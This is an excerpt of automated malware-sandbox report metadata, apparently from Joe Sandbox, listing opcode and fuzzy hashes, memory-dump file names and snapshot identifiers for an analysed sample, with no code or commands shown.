                                            • Instruction ID: cbadcd40dbbc83f85162931122ef495b6997b8b5292eedb803c801c6da173839
                                            • Opcode Fuzzy Hash: fe21089785e6a1748e56388996be618063e6c4318fc8050aa5774256bf8bb64f
                                            • Instruction Fuzzy Hash: BFF08C33A20A340B6360CC7A8D05097A2C797C86B0B0FC979ECA0E7206E930EC0656D1
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2137568261.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                            • Associated: 00000000.00000002.2137549440.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.00000000012D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138452275.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.00000000012DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001469000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001576000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.000000000157A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.000000000165B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001662000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138724514.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138830242.000000000182B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138846251.000000000182D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b90000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e33912ca4d1b147a9e871143e37d9b1a79061582bf56623de8956d506c44f5b7
                                            • Instruction ID: 1bec72e4fbdb280d7e726a648ddd9d7a2dcae1bbc217e598b65449640cf9b1f3
                                            • Opcode Fuzzy Hash: e33912ca4d1b147a9e871143e37d9b1a79061582bf56623de8956d506c44f5b7
                                            • Instruction Fuzzy Hash: 84B01232D012008B6716C93CE8710D172F273D1310396D4E8D00345004E735D0028F00
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2137568261.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                            • Associated: 00000000.00000002.2137549440.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.00000000012D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138452275.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.00000000012DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001469000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001576000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.000000000157A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.000000000165B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001662000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138724514.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138830242.000000000182B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138846251.000000000182D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b90000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: [
                                            • API String ID: 0-784033777
                                            • Opcode ID: 9f5b9476e6c6a79130fe00440bbbc2c336ddb2b9938bb553857b9ec5b97cee7f
                                            • Instruction ID: c956e9e8e9e9b66a9c2cabded67701dad4e733d7cef069b103449f6772b9063a
                                            • Opcode Fuzzy Hash: 9f5b9476e6c6a79130fe00440bbbc2c336ddb2b9938bb553857b9ec5b97cee7f
                                            • Instruction Fuzzy Hash: 66B1567190838D6BDB399A2488D277BBBD8EB55304F1845ADEFC5C7182EB79C84C8352